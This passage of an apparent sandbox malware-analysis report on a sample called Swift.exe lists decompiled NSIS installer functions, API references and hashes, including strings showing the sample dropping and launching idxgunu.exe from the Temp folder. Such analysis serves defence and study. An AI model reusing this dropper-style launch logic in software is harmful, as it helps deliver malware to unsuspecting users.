0x004017f9
0x00401806
0x00401811
0x00401827
0x00401827
0x0040182a
0x00000000
0x00401830
0x00401830
0x00401831
0x0040184e
0x004028aa
0x004028aa
0x004028aa
0x00401833
0x00401833
0x00401834
0x00401492
0x00402224
0x00402224
0x00402224
0x00401831
0x0040182a
0x004028ac
0x004028b0
0x004028b0
0x0040185e
0x00401863
0x00401871
0x00401876
0x0040187c
0x00401880
0x00401882
0x0040188a
0x00401896
0x00401884
0x00401884
0x00401888
0x00000000
0x00000000
0x00401888
0x0040189f
0x004018a5
0x004018a7
0x00000000
0x004018ad
0x004018ad
0x004018b0
0x004018c8
0x004018b2
0x004018b5
0x004018be
0x004018be
0x004018cd
0x004018d2
0x0040221f
0x00000000
0x0040221f
0x00000000

APIs

lstrcatA.KERNEL32(00000000,00000000,"C:\Users\user\AppData\Local\Temp\idxgunu.exe" C:\Users\user\AppData\Local\Temp\jdgedcev.bx,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\idxgunu.exe" C:\Users\user\AppData\Local\Temp\jdgedcev.bx,"C:\Users\user\AppData\Local\Temp\idxgunu.exe" C:\Users\user\AppData\Local\Temp\jdgedcev.bx,00000000,00000000,"C:\Users\user\AppData\Local\Temp\idxgunu.exe" C:\Users\user\AppData\Local\Temp\jdgedcev.bx,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D

Part of subcall function 00405B85: lstrcpynA.KERNEL32(?,?,00000400,004031A1,007A1F80,NSIS Error), ref: 00405B92

Part of subcall function 00404E71: lstrlenA.KERNEL32(0079E568,00000000,0078F738,00789938,?,?,?,?,?,?,?,?,?,00402FAB,00000000,?), ref: 00404EAA
Part of subcall function 00404E71: lstrlenA.KERNEL32(00402FAB,0079E568,00000000,0078F738,00789938,?,?,?,?,?,?,?,?,?,00402FAB,00000000), ref: 00404EBA
Part of subcall function 00404E71: lstrcatA.KERNEL32(0079E568,00402FAB,00402FAB,0079E568,00000000,0078F738,00789938), ref: 00404ECD
Part of subcall function 00404E71: SetWindowTextA.USER32(0079E568,0079E568), ref: 00404EDF
Part of subcall function 00404E71: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F05
Part of subcall function 00404E71: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F1F
Part of subcall function 00404E71: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F2D

Strings

"C:\Users\user\AppData\Local\Temp\idxgunu.exe" C:\Users\user\AppData\Local\Temp\jdgedcev.bx, xrefs: 00401750, 00401766, 00401778, 00401789, 004017BF, 004017D5, 004017F3, 00401833, 004018B4, 004018BD, 004018C7, 004018D2
C:\Users\user\AppData\Local\Temp, xrefs: 00401761

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: "C:\Users\user\AppData\Local\Temp\idxgunu.exe" C:\Users\user\AppData\Local\Temp\jdgedcev.bx$C:\Users\user\AppData\Local\Temp
API String ID: 1941528284-3196457880
Opcode ID: 4953db5bdb3683730932cb0fc15fd0ddf0fb8859fc8cfa250e525847abe40efc
Instruction ID: 35227170a6803e04a89ebc6a39771a13e2a32dfc240d2ebb168db09231c5d6cb
Opcode Fuzzy Hash: 4953db5bdb3683730932cb0fc15fd0ddf0fb8859fc8cfa250e525847abe40efc
Instruction Fuzzy Hash: 10419572914514BACB107BA5CC45DAF3679EF42369B20833BF421F11E1D67C5A418A6E

Uniqueness

Uniqueness Score: -1.00%

Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E00402A0C(0xfffffff0);
				_t10 = E0040570C(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E004056A3(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x24)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405B85("C:\\Users\\jones\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x7a2808 =  *0x7a2808 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

0x004015b3
0x004015ba
0x004015bd
0x004015c2
0x004015c6
0x004015c8
0x004015d0
0x004015d6
0x004015d8
0x004015db
0x004015e3
0x004015f0
0x004015fd
0x004015fd
0x004015f2
0x004015f3
0x004015fb
0x00000000
0x00000000
0x004015fb
0x004015f0
0x00401600
0x00401603
0x00401605
0x00401606
0x004015c8
0x0040160d
0x0040162d
0x0040217a
0x0040160f
0x00401611
0x0040161c
0x00401622
0x00401622
0x004028a4
0x004028b0

APIs

Part of subcall function 0040570C: CharNextA.USER32(004054BE,?,C:\,00000000,00405770,C:\,C:\,?,?,00000000,004054BE,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040571A
Part of subcall function 0040570C: CharNextA.USER32(00000000), ref: 0040571F
Part of subcall function 0040570C: CharNextA.USER32(00000000), ref: 0040572E

CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401617

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 3751793516-47812868
Opcode ID: cd73d16fb19e5aa7ec29fc3b0f95dfba00c80b277e9a763f670bbd41073f69e8
Instruction ID: afeb13c966c6312caca67f811ce75781abbcde217ba7d8455046109cab38407c
Opcode Fuzzy Hash: cd73d16fb19e5aa7ec29fc3b0f95dfba00c80b277e9a763f670bbd41073f69e8
Instruction Fuzzy Hash: DE01E131908140AFDB216BA95D4896E77F49E92365B28073BF491B22E2C53C09429A2E

Uniqueness

Uniqueness Score: -1.00%

Function 00405EA7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405EA7(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x409010; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryA( &_v292); // executed
				return _t14;
			}

0x00405ebe
0x00405ec7
0x00405ec9
0x00405ec9
0x00405ecd
0x00405edf
0x00405ed9
0x00405ed9
0x00405ed9
0x00405ee3
0x00405ef7
0x00405f07
0x00405f0e

APIs

GetSystemDirectoryA.KERNEL32 ref: 00405EBE
wsprintfA.USER32 ref: 00405EF7
LoadLibraryA.KERNELBASE(?), ref: 00405F07

Strings

\, xrefs: 00405ECF
%s%s.dll, xrefs: 00405EF1

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$\
API String ID: 2200240437-500877883
Opcode ID: bac9a2fc6f46d7ce26ef8fb07d33782f421afe65be062073a8d3b7340457a89d
Instruction ID: d508898cc95de1e0c434a07a6294dde47261863d0e32159c0440bcb52ebf81b8
Opcode Fuzzy Hash: bac9a2fc6f46d7ce26ef8fb07d33782f421afe65be062073a8d3b7340457a89d
Instruction Fuzzy Hash: 79F02B309001095BDB159764DC0DEFB376CEB08305F14057BA186E10C2F678E9658FE8

Uniqueness

Uniqueness Score: -1.00%

Function 0040588B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040588B(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}

0x0040588f
0x00405895
0x00405896
0x00405896
0x00405897
0x0040589e
0x004058a8
0x004058b5
0x004058b8
0x004058c0
0x00000000
0x00000000
0x004058c4
0x00000000
0x00000000
0x004058c6
0x00000000
0x004058c6
0x00000000

APIs

GetTickCount.KERNEL32 ref: 0040589E
GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004058B8

Strings

nsa, xrefs: 00405897
"C:\Users\user\Desktop\Swift.exe", xrefs: 0040588B
C:\Users\user\AppData\Local\Temp\, xrefs: 0040588E, 00405892

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\Swift.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-3349116164
Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction ID: 16434cd12899dfe2e818f6e9e5afe7b708d6253f6ed06b96b8894a961f30c2dc
Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction Fuzzy Hash: F3F0A73734830476E7105E55DC04B9B7F69DF91750F14C02BFE449A1C0D6B0996887A5

Uniqueness

Uniqueness Score: -1.00%

Function 00405759 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E00405759(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00405B85(0x7a0198, _a4);
				_t21 = E0040570C(0x7a0198);
				if(_t21 != 0) {
					E00405DE7(_t21);
					if(( *0x7a2798 & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x7a0198;
						while(1) {
							_t11 = lstrlenA(0x7a0198);
							_push(0x7a0198);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E00405E80();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E004056BF(0x7a0198);
								continue;
							} else {
								goto L1;
							}
						}
						E00405678();
						_t16 = GetFileAttributesA(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405765
0x00405770
0x00405774
0x0040577b
0x00405787
0x00405793
0x00405793
0x004057ab
0x004057ac
0x004057b3
0x004057b4
0x00000000
0x00000000
0x00405797
0x0040579e
0x004057a6
0x00000000
0x00000000
0x00000000
0x00000000
0x0040579e
0x004057b6
0x004057bc
0x00000000
0x004057ca
0x00405789
0x0040578d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040578d
0x00405776
0x00000000

APIs

Part of subcall function 00405B85: lstrcpynA.KERNEL32(?,?,00000400,004031A1,007A1F80,NSIS Error), ref: 00405B92

Part of subcall function 0040570C: CharNextA.USER32(004054BE,?,C:\,00000000,00405770,C:\,C:\,?,?,00000000,004054BE,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040571A
Part of subcall function 0040570C: CharNextA.USER32(00000000), ref: 0040571F
Part of subcall function 0040570C: CharNextA.USER32(00000000), ref: 0040572E

lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,?,?,00000000,004054BE,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057AC
GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,00000000,004054BE,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057BC

Strings

C:\, xrefs: 0040575F, 00405764, 0040576A, 004057A5, 004057AB, 004057B3, 004057BB

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\
API String ID: 3248276644-3404278061
Opcode ID: 914741ae411269a65dcaa6fe296bb24b05aa6b1ae79eea7fd411b9eadad4ef61
Instruction ID: 23ae6535d0b8dcba1362e5de7f505f4bd7cb270d9ded5dbbc6de04e172cf12ef
Opcode Fuzzy Hash: 914741ae411269a65dcaa6fe296bb24b05aa6b1ae79eea7fd411b9eadad4ef61
Instruction Fuzzy Hash: 31F02835005E5495D323233A1C09EAF1B45CEC3364F18063BF854B32D6DA3C8842ACBE

Uniqueness

Uniqueness Score: -1.00%

Function 004053E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004053E5(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x7a0d98->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x7a0d98,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x004053ee
0x0040540a
0x00405412
0x00405417
0x00000000
0x0040541d
0x00405421

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,007A0D98,Error launching installer), ref: 0040540A
CloseHandle.KERNEL32(?), ref: 00405417

Strings

Error launching installer, xrefs: 004053F8

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: b92d75b79f83a8f319f418273f07bcb1c4434af9cb600427507fea5ca96add3e
Instruction ID: 724a13ebb49d9ac7ab761b24e3602c488b69e66e98061dca187f378feab80576
Opcode Fuzzy Hash: b92d75b79f83a8f319f418273f07bcb1c4434af9cb600427507fea5ca96add3e
Instruction Fuzzy Hash: 60E01DB5A00209ABDB00DFA4DC09E6F7BBCFB44745B408521F914F2150D778E4108AB9

Uniqueness

Uniqueness Score: -1.00%

Function 00401E1B Relevance: 4.5, APIs: 3, Instructions: 48
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00401E1B() {
				void* _t15;
				void* _t24;
				void* _t26;
				void* _t31;

				_t28 = E00402A0C(_t24);
				E00404E71(0xffffffeb, _t13);
				_t15 = E004053E5(_t28); // executed
				 *(_t31 + 8) = _t15;
				if(_t15 == _t24) {
					 *((intOrPtr*)(_t31 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t31 - 0x20)) != _t24) {
						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
							E00405F4D(0xf);
						}
						GetExitCodeProcess( *(_t31 + 8), _t31 - 0xc); // executed
						if( *((intOrPtr*)(_t31 - 0x24)) < _t24) {
							if( *(_t31 - 0xc) != _t24) {
								 *((intOrPtr*)(_t31 - 4)) = 1;
							}
						} else {
							E00405AE3(_t26,  *(_t31 - 0xc));
						}
					}
					_push( *(_t31 + 8));
					CloseHandle();
				}
				 *0x7a2808 =  *0x7a2808 +  *((intOrPtr*)(_t31 - 4));
				return 0;
			}

0x00401e21
0x00401e26
0x00401e2c
0x00401e33
0x00401e36
0x00402672
0x00401e3c
0x00401e3f
0x00401e50
0x00401e4b
0x00401e4b
0x00401e65
0x00401e6e
0x00401e7e
0x00401e80
0x00401e80
0x00401e70
0x00401e74
0x00401e74
0x00401e6e
0x00401e87
0x00401e8a
0x00401e8a
0x004028a4
0x004028b0

APIs

Part of subcall function 00404E71: lstrlenA.KERNEL32(0079E568,00000000,0078F738,00789938,?,?,?,?,?,?,?,?,?,00402FAB,00000000,?), ref: 00404EAA
Part of subcall function 00404E71: lstrlenA.KERNEL32(00402FAB,0079E568,00000000,0078F738,00789938,?,?,?,?,?,?,?,?,?,00402FAB,00000000), ref: 00404EBA
Part of subcall function 00404E71: lstrcatA.KERNEL32(0079E568,00402FAB,00402FAB,0079E568,00000000,0078F738,00789938), ref: 00404ECD
Part of subcall function 00404E71: SetWindowTextA.USER32(0079E568,0079E568), ref: 00404EDF
Part of subcall function 00404E71: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F05
Part of subcall function 00404E71: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F1F
Part of subcall function 00404E71: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F2D

Part of subcall function 004053E5: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,007A0D98,Error launching installer), ref: 0040540A
Part of subcall function 004053E5: CloseHandle.KERNEL32(?), ref: 00405417

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E55
GetExitCodeProcess.KERNELBASE ref: 00401E65
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401E8A

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
String ID:
API String ID: 3521207402-0
Opcode ID: 9f7b8980a75f566b2c07a3fc024971c892a72e25242494b06bac8b8dc5c293d8
Instruction ID: 0ea86b62eb6e7f45a98ed510c7c63763dd525cc3e39f031d41df26274e6877e0
Opcode Fuzzy Hash: 9f7b8980a75f566b2c07a3fc024971c892a72e25242494b06bac8b8dc5c293d8
Instruction Fuzzy Hash: 58016931D04104EBDF11AFA1C985A9E7BB1EB40358F24817BF905B61E1C77D4A81DB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x7a27b0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x7a1f6c =  *0x7a1f6c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x7a1f6c, 0x7530,  *0x7a1f54), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(00000020,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

